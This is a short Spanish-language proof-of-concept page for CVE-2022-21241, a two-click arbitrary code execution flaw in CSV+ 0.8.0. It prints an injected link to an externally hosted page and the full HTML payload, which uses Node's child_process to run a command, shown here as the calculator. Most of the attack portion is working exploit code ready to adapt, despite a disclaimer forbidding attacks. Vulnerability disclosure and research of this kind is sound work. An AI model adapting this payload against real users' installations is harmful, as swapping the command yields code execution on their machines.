
👻 [PoC] CSV+ 0.8.0 - Ejecución de Código Arbitrario (CVE-2022-21241)
👻 Vulnerabilidad de Ejecución de Código Arbitrario en 2 Clics.

CVE-2022-21241
⚠
Este PoC fue creado para alertar a los usuarios e investigar vulnerabilidades en su propio CSV+, y está prohibido su uso para ataques.
Las siguientes versiones son vulnerables.
Los atacantes pueden ejecutar código arbitrario utilizando la funcionalidad de Node.js. Colocarán el código js malicioso en algún sitio y lo enlazarán desde etiquetas a con la vulnerabilidad de inyección HTML en CSV+.

<a href='https://electronooooo.htmlbin.net/xsscalc.html'>haz clic en mí 👻</a>
https://electronooooo.htmlbin.net/xsscalc.html es un enlace temporal.
<!DOCTYPE html>
<html>
<head>
<script>
var cmd = "calc";
require("child_process").exec(cmd);
</script>
</head>
<body>
Hola :)
</body>
</html>